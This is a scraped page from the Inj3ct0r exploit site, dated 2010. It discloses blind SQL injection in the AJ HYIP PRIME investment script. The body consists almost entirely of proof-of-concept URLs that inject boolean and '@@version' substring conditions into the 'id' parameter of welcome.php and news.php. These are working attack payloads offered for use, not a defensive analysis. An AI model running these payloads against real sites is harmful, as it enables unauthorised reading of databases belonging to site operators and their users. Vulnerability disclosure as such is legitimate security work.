AJ HYIP PRIME (welcome.php/news.php) Blind SQL Injection Vulnerability
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>AJ HYIP PRIME (welcome.php/news.php) Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================================
AJ HYIP PRIME (welcome.php/news.php) Blind SQL Injection Vulnerability
======================================================================
- site: http://www.ajsquare.com/products/ajhyip/index.php
- about AJ HYIP:
AJ HYIP is a complete financial tool with no technical
knowledge required to manage the site. AJ HYIP software
is the latest and most advanced HYIP Script with excellent
navigation features. Our HYIP Script can be easily customized
to accustom your needs with a potential to generate heavy revenues.
~~ [POC]
http://target/path/welcome.php?id=3 [bSQL]
http://target/path/welcome.php?id=3 and 1=1
http://target/path/welcome.php?id=3 and 1=2
~~ [DEMO]
http://server/prime/welcome.php?id=3 and substring(@@version,1,1)=4
http://server/prime/welcome.php?id=3 and substring(@@version,1,1)=5
~~ [POC]
http://target/path/news.php?id=1 [bSQL]
http://target/path/news.php?id=1 and 1=1
http://target/path/news.php?id=1 and 1=2
~~ [DEMO]
http://server/meridian/news.php?id=1 and substring(@@version,1,1)=4
http://server/meridian/news.php?id=1 and substring(@@version,1,1)=5
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-22]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13429
Leave a Reply